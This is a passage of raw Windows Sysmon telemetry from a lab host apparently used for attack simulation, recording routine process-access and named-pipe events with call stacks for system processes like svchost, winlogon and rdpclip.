12:24:43.341{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-0F00-00000000BB01}936C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+625bd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 18141800x8000000000000000292303Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-ConnectPipe2021-04-27 12:24:43.341{BEA10069-D0C2-6086-0F00-00000000BB01}936\TSVCPIPE-e0582208-0b1b-4d6e-9177-8dab2eb6ce38C:\Windows\System32\svchost.exe 10341000x8000000000000000292302Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.341{BEA10069-028B-6088-0B2A-00000000BB01}52406848C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4349_none_7f09d74e21ec00ab\TiWorker.exe{BEA10069-028B-6088-0A2A-00000000BB01}3780C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4349_none_7f09d74e21ec00ab\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x8000000000000000292301Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.325{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1700-00000000BB01}1348C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292300Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.325{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+6260e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000292299Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.325{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-0F00-00000000BB01}936C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+625bd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 18141800x8000000000000000292298Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-ConnectPipe2021-04-27 12:24:43.325{BEA10069-D0C2-6086-0F00-00000000BB01}936\TSVCPIPE-e0582208-0b1b-4d6e-9177-8dab2eb6ce38C:\Windows\System32\svchost.exe 10341000x8000000000000000292297Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.325{BEA10069-028B-6088-0B2A-00000000BB01}52406848C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4349_none_7f09d74e21ec00ab\TiWorker.exe{BEA10069-028B-6088-0A2A-00000000BB01}3780C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4349_none_7f09d74e21ec00ab\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x8000000000000000292296Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.325{BEA10069-D0C2-6086-0C00-00000000BB01}728996C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292295Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.325{BEA10069-D0C2-6086-0C00-00000000BB01}728996C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292294Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.325{BEA10069-D0C2-6086-0C00-00000000BB01}728996C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x8000000000000000292293Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-ConnectPipe2021-04-27 12:24:43.325{BEA10069-D0C2-6086-0F00-00000000BB01}936\TSVCPIPE-e0582208-0b1b-4d6e-9177-8dab2eb6ce38C:\Windows\System32\svchost.exe 18141800x8000000000000000292292Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-ConnectPipe2021-04-27 12:24:43.309{BEA10069-D0C2-6086-0F00-00000000BB01}936\TSVCPIPE-e0582208-0b1b-4d6e-9177-8dab2eb6ce38C:\Windows\System32\svchost.exe 18141800x8000000000000000292291Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-ConnectPipe2021-04-27 12:24:43.309{BEA10069-D0C2-6086-0F00-00000000BB01}936\TSVCPIPE-e0582208-0b1b-4d6e-9177-8dab2eb6ce38C:\Windows\System32\svchost.exe 10341000x8000000000000000292290Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.294{BEA10069-D0C2-6086-0C00-00000000BB01}728996C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292289Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.294{BEA10069-D0C2-6086-0C00-00000000BB01}7284380C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1100-00000000BB01}1012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292288Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.294{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292287Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.294{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-2590-6087-DA0F-00000000BB01}3156C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292286Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.294{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292285Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.294{BEA10069-D4AB-6086-4301-00000000BB01}33842040C:\Windows\system32\csrss.exe{BEA10069-028B-6088-0C2A-00000000BB01}7148C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000292284Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.294{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2b2a|c:\windows\system32\SYSNTFY.dll+15cd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49e78|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292283Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.294{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+48674|C:\Windows\System32\RPCRT4.dll+31850|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292282Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.294{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-276A-6087-1610-00000000BB01}2640C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x8000000000000000292281Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-ConnectPipe2021-04-27 12:24:43.294{BEA10069-D0C2-6086-0F00-00000000BB01}936\TSVCPIPE-e0582208-0b1b-4d6e-9177-8dab2eb6ce38C:\Windows\System32\svchost.exe 10341000x8000000000000000292280Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.294{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292279Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.294{BEA10069-D0C2-6086-0C00-00000000BB01}728996C:\Windows\system32\svchost.exe{BEA10069-D4AE-6086-4C01-00000000BB01}4036C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292278Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.294{BEA10069-D0C2-6086-0C00-00000000BB01}728996C:\Windows\system32\svchost.exe{BEA10069-D4AE-6086-4C01-00000000BB01}4036C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292277Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:43.294{BEA10069-D0C2-6086-0C00-00000000BB01}7286184C:\Windows\system32\svchost.exe{BEA10069-0289-6088-052A-00000000BB01}6340C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+5b40|c:\windows\system32\lsm.dll+2de4|c:\windows\system32\lsm.dll+57af|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292276Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 